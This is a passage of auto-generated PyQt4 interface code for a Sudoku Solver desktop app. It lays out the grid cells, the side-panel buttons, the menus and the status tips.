self.label_5_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_6.setObjectName(_fromUtf8("label_5_6"))
self.gridLayout_6.addWidget(self.label_5_6, 2, 0, 1, 1)
self.label_4_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_7.sizePolicy().hasHeightForWidth())
self.label_4_7.setSizePolicy(sizePolicy)
self.label_4_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_7.setFont(font)
self.label_4_7.setAutoFillBackground(False)
self.label_4_7.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_7.setFrameShape(QtGui.QFrame.Panel)
self.label_4_7.setText(_fromUtf8(""))
self.label_4_7.setTextFormat(QtCore.Qt.PlainText)
self.label_4_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_7.setObjectName(_fromUtf8("label_4_7"))
self.gridLayout_6.addWidget(self.label_4_7, 1, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_6, 1, 2, 1, 1)
self.gridLayout_7 = QtGui.QGridLayout()
self.gridLayout_7.setSpacing(0)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.label_6_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_2.sizePolicy().hasHeightForWidth())
self.label_6_2.setSizePolicy(sizePolicy)
self.label_6_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_2.setFont(font)
self.label_6_2.setAutoFillBackground(False)
self.label_6_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_2.setFrameShape(QtGui.QFrame.Panel)
self.label_6_2.setText(_fromUtf8(""))
self.label_6_2.setTextFormat(QtCore.Qt.PlainText)
self.label_6_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_2.setObjectName(_fromUtf8("label_6_2"))
self.gridLayout_7.addWidget(self.label_6_2, 0, 2, 1, 1)
self.label_7_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_2.sizePolicy().hasHeightForWidth())
self.label_7_2.setSizePolicy(sizePolicy)
self.label_7_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_2.setFont(font)
self.label_7_2.setAutoFillBackground(False)
self.label_7_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_2.setFrameShape(QtGui.QFrame.Panel)
self.label_7_2.setText(_fromUtf8(""))
self.label_7_2.setTextFormat(QtCore.Qt.PlainText)
self.label_7_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_2.setObjectName(_fromUtf8("label_7_2"))
self.gridLayout_7.addWidget(self.label_7_2, 1, 2, 1, 1)
self.label_7_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_1.sizePolicy().hasHeightForWidth())
self.label_7_1.setSizePolicy(sizePolicy)
self.label_7_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_1.setFont(font)
self.label_7_1.setAutoFillBackground(False)
self.label_7_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_1.setFrameShape(QtGui.QFrame.Panel)
self.label_7_1.setText(_fromUtf8(""))
self.label_7_1.setTextFormat(QtCore.Qt.PlainText)
self.label_7_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_1.setObjectName(_fromUtf8("label_7_1"))
self.gridLayout_7.addWidget(self.label_7_1, 1, 1, 1, 1)
self.label_7_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_0.sizePolicy().hasHeightForWidth())
self.label_7_0.setSizePolicy(sizePolicy)
self.label_7_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_0.setFont(font)
self.label_7_0.setAutoFillBackground(False)
self.label_7_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_0.setFrameShape(QtGui.QFrame.Panel)
self.label_7_0.setText(_fromUtf8(""))
self.label_7_0.setTextFormat(QtCore.Qt.PlainText)
self.label_7_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_0.setObjectName(_fromUtf8("label_7_0"))
self.gridLayout_7.addWidget(self.label_7_0, 1, 0, 1, 1)
self.label_6_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_0.sizePolicy().hasHeightForWidth())
self.label_6_0.setSizePolicy(sizePolicy)
self.label_6_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_0.setFont(font)
self.label_6_0.setAutoFillBackground(False)
self.label_6_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_0.setFrameShape(QtGui.QFrame.Panel)
self.label_6_0.setLineWidth(1)
self.label_6_0.setText(_fromUtf8(""))
self.label_6_0.setTextFormat(QtCore.Qt.PlainText)
self.label_6_0.setScaledContents(False)
self.label_6_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_0.setObjectName(_fromUtf8("label_6_0"))
self.gridLayout_7.addWidget(self.label_6_0, 0, 0, 1, 1)
self.label_8_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_0.sizePolicy().hasHeightForWidth())
self.label_8_0.setSizePolicy(sizePolicy)
self.label_8_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_0.setFont(font)
self.label_8_0.setAutoFillBackground(False)
self.label_8_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_0.setFrameShape(QtGui.QFrame.Panel)
self.label_8_0.setText(_fromUtf8(""))
self.label_8_0.setTextFormat(QtCore.Qt.PlainText)
self.label_8_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_0.setObjectName(_fromUtf8("label_8_0"))
self.gridLayout_7.addWidget(self.label_8_0, 2, 0, 1, 1)
self.label_8_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_2.sizePolicy().hasHeightForWidth())
self.label_8_2.setSizePolicy(sizePolicy)
self.label_8_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_2.setFont(font)
self.label_8_2.setAutoFillBackground(False)
self.label_8_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_2.setFrameShape(QtGui.QFrame.Panel)
self.label_8_2.setText(_fromUtf8(""))
self.label_8_2.setTextFormat(QtCore.Qt.PlainText)
self.label_8_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_2.setObjectName(_fromUtf8("label_8_2"))
self.gridLayout_7.addWidget(self.label_8_2, 2, 2, 1, 1)
self.label_8_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_1.sizePolicy().hasHeightForWidth())
self.label_8_1.setSizePolicy(sizePolicy)
self.label_8_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_1.setFont(font)
self.label_8_1.setAutoFillBackground(False)
self.label_8_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_1.setFrameShape(QtGui.QFrame.Panel)
self.label_8_1.setText(_fromUtf8(""))
self.label_8_1.setTextFormat(QtCore.Qt.PlainText)
self.label_8_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_1.setObjectName(_fromUtf8("label_8_1"))
self.gridLayout_7.addWidget(self.label_8_1, 2, 1, 1, 1)
self.label_6_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_1.sizePolicy().hasHeightForWidth())
self.label_6_1.setSizePolicy(sizePolicy)
self.label_6_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_1.setFont(font)
self.label_6_1.setAutoFillBackground(False)
self.label_6_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_1.setFrameShape(QtGui.QFrame.Panel)
self.label_6_1.setFrameShadow(QtGui.QFrame.Plain)
self.label_6_1.setText(_fromUtf8(""))
self.label_6_1.setTextFormat(QtCore.Qt.PlainText)
self.label_6_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_1.setObjectName(_fromUtf8("label_6_1"))
self.gridLayout_7.addWidget(self.label_6_1, 0, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_7, 2, 0, 1, 1)
self.gridLayout_1 = QtGui.QGridLayout()
self.gridLayout_1.setSpacing(0)
self.gridLayout_1.setObjectName(_fromUtf8("gridLayout_1"))
self.label_0_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_0.sizePolicy().hasHeightForWidth())
self.label_0_0.setSizePolicy(sizePolicy)
self.label_0_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_0.setFont(font)
self.label_0_0.setAutoFillBackground(False)
self.label_0_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_0.setFrameShape(QtGui.QFrame.Panel)
self.label_0_0.setLineWidth(1)
self.label_0_0.setText(_fromUtf8(""))
self.label_0_0.setTextFormat(QtCore.Qt.PlainText)
self.label_0_0.setScaledContents(False)
self.label_0_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_0.setObjectName(_fromUtf8("label_0_0"))
self.gridLayout_1.addWidget(self.label_0_0, 0, 0, 1, 1)
self.label_2_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_2.sizePolicy().hasHeightForWidth())
self.label_2_2.setSizePolicy(sizePolicy)
self.label_2_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_2.setFont(font)
self.label_2_2.setAutoFillBackground(False)
self.label_2_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_2.setFrameShape(QtGui.QFrame.Panel)
self.label_2_2.setText(_fromUtf8(""))
self.label_2_2.setTextFormat(QtCore.Qt.PlainText)
self.label_2_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_2.setObjectName(_fromUtf8("label_2_2"))
self.gridLayout_1.addWidget(self.label_2_2, 2, 2, 1, 1)
self.label_1_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_0.sizePolicy().hasHeightForWidth())
self.label_1_0.setSizePolicy(sizePolicy)
self.label_1_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_0.setFont(font)
self.label_1_0.setAutoFillBackground(False)
self.label_1_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_0.setFrameShape(QtGui.QFrame.Panel)
self.label_1_0.setText(_fromUtf8(""))
self.label_1_0.setTextFormat(QtCore.Qt.PlainText)
self.label_1_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_0.setObjectName(_fromUtf8("label_1_0"))
self.gridLayout_1.addWidget(self.label_1_0, 1, 0, 1, 1)
self.label_0_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_2.sizePolicy().hasHeightForWidth())
self.label_0_2.setSizePolicy(sizePolicy)
self.label_0_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_2.setFont(font)
self.label_0_2.setAutoFillBackground(False)
self.label_0_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_2.setFrameShape(QtGui.QFrame.Panel)
self.label_0_2.setText(_fromUtf8(""))
self.label_0_2.setTextFormat(QtCore.Qt.PlainText)
self.label_0_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_2.setObjectName(_fromUtf8("label_0_2"))
self.gridLayout_1.addWidget(self.label_0_2, 0, 2, 1, 1)
self.label_1_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_1.sizePolicy().hasHeightForWidth())
self.label_1_1.setSizePolicy(sizePolicy)
self.label_1_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_1.setFont(font)
self.label_1_1.setAutoFillBackground(False)
self.label_1_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_1.setFrameShape(QtGui.QFrame.Panel)
self.label_1_1.setText(_fromUtf8(""))
self.label_1_1.setTextFormat(QtCore.Qt.PlainText)
self.label_1_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_1.setObjectName(_fromUtf8("label_1_1"))
self.gridLayout_1.addWidget(self.label_1_1, 1, 1, 1, 1)
self.label_0_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_1.sizePolicy().hasHeightForWidth())
self.label_0_1.setSizePolicy(sizePolicy)
self.label_0_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_1.setFont(font)
self.label_0_1.setAutoFillBackground(False)
self.label_0_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_1.setFrameShape(QtGui.QFrame.Panel)
self.label_0_1.setFrameShadow(QtGui.QFrame.Plain)
self.label_0_1.setText(_fromUtf8(""))
self.label_0_1.setTextFormat(QtCore.Qt.PlainText)
self.label_0_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_1.setObjectName(_fromUtf8("label_0_1"))
self.gridLayout_1.addWidget(self.label_0_1, 0, 1, 1, 1)
self.label_1_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_2.sizePolicy().hasHeightForWidth())
self.label_1_2.setSizePolicy(sizePolicy)
self.label_1_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_2.setFont(font)
self.label_1_2.setAutoFillBackground(False)
self.label_1_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_2.setFrameShape(QtGui.QFrame.Panel)
self.label_1_2.setText(_fromUtf8(""))
self.label_1_2.setTextFormat(QtCore.Qt.PlainText)
self.label_1_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_2.setObjectName(_fromUtf8("label_1_2"))
self.gridLayout_1.addWidget(self.label_1_2, 1, 2, 1, 1)
self.label_2_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_0.sizePolicy().hasHeightForWidth())
self.label_2_0.setSizePolicy(sizePolicy)
self.label_2_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_0.setFont(font)
self.label_2_0.setAutoFillBackground(False)
self.label_2_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_0.setFrameShape(QtGui.QFrame.Panel)
self.label_2_0.setText(_fromUtf8(""))
self.label_2_0.setTextFormat(QtCore.Qt.PlainText)
self.label_2_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_0.setObjectName(_fromUtf8("label_2_0"))
self.gridLayout_1.addWidget(self.label_2_0, 2, 0, 1, 1)
self.label_2_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_1.sizePolicy().hasHeightForWidth())
self.label_2_1.setSizePolicy(sizePolicy)
self.label_2_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_1.setFont(font)
self.label_2_1.setAutoFillBackground(False)
self.label_2_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_1.setFrameShape(QtGui.QFrame.Panel)
self.label_2_1.setText(_fromUtf8(""))
self.label_2_1.setTextFormat(QtCore.Qt.PlainText)
self.label_2_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_1.setObjectName(_fromUtf8("label_2_1"))
self.gridLayout_1.addWidget(self.label_2_1, 2, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_1, 0, 0, 1, 1)
self.gridLayout_10.addLayout(self.mainGridLayout, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.widget)
self.gridLayoutSidePanel = QtGui.QGridLayout()
self.gridLayoutSidePanel.setHorizontalSpacing(0)
self.gridLayoutSidePanel.setObjectName(_fromUtf8("gridLayoutSidePanel"))
self.txtbrwSolutionbox = QtGui.QTextBrowser(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.txtbrwSolutionbox.sizePolicy().hasHeightForWidth())
self.txtbrwSolutionbox.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily(_fromUtf8("DejaVu Sans Mono"))
self.txtbrwSolutionbox.setFont(font)
self.txtbrwSolutionbox.setTabChangesFocus(True)
self.txtbrwSolutionbox.setObjectName(_fromUtf8("txtbrwSolutionbox"))
self.gridLayoutSidePanel.addWidget(self.txtbrwSolutionbox, 1, 0, 1, 2)
self.btnSave = QtGui.QPushButton(self.centralwidget)
self.btnSave.setObjectName(_fromUtf8("btnSave"))
self.gridLayoutSidePanel.addWidget(self.btnSave, 2, 0, 1, 1)
self.btnRevert = QtGui.QPushButton(self.centralwidget)
self.btnRevert.setObjectName(_fromUtf8("btnRevert"))
self.gridLayoutSidePanel.addWidget(self.btnRevert, 2, 1, 1, 1)
self.btnSolve = QtGui.QPushButton(self.centralwidget)
self.btnSolve.setObjectName(_fromUtf8("btnSolve"))
self.gridLayoutSidePanel.addWidget(self.btnSolve, 4, 1, 1, 1)
self.btnClear = QtGui.QPushButton(self.centralwidget)
self.btnClear.setObjectName(_fromUtf8("btnClear"))
self.gridLayoutSidePanel.addWidget(self.btnClear, 4, 0, 1, 1)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayoutSidePanel.addWidget(self.label, 0, 0, 1, 2)
self.horizontalLayout.addLayout(self.gridLayoutSidePanel)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 805, 26))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName(_fromUtf8("menuFile"))
self.menuView = QtGui.QMenu(self.menubar)
self.menuView.setObjectName(_fromUtf8("menuView"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
self.menuSolution = QtGui.QMenu(self.menubar)
self.menuSolution.setObjectName(_fromUtf8("menuSolution"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName(_fromUtf8("actionExit"))
self.actionFullscreen = QtGui.QAction(MainWindow)
self.actionFullscreen.setCheckable(True)
self.actionFullscreen.setObjectName(_fromUtf8("actionFullscreen"))
self.actionHowToUse = QtGui.QAction(MainWindow)
self.actionHowToUse.setObjectName(_fromUtf8("actionHowToUse"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionShowSolution = QtGui.QAction(MainWindow)
self.actionShowSolution.setCheckable(True)
self.actionShowSolution.setChecked(True)
self.actionShowSolution.setObjectName(_fromUtf8("actionShowSolution"))
self.menuFile.addAction(self.actionExit)
self.menuView.addAction(self.actionFullscreen)
self.menuHelp.addAction(self.actionHowToUse)
self.menuHelp.addAction(self.actionAbout)
self.menuSolution.addAction(self.actionShowSolution)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuSolution.menuAction())
self.menubar.addAction(self.menuView.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.actionExit, QtCore.SIGNAL(_fromUtf8("triggered()")), MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.btnSave, self.btnRevert)
MainWindow.setTabOrder(self.btnRevert, self.btnClear)
MainWindow.setTabOrder(self.btnClear, self.btnSolve)
MainWindow.setTabOrder(self.btnSolve, self.txtbrwSolutionbox)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Sudoku Solver", None))
self.label_3_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
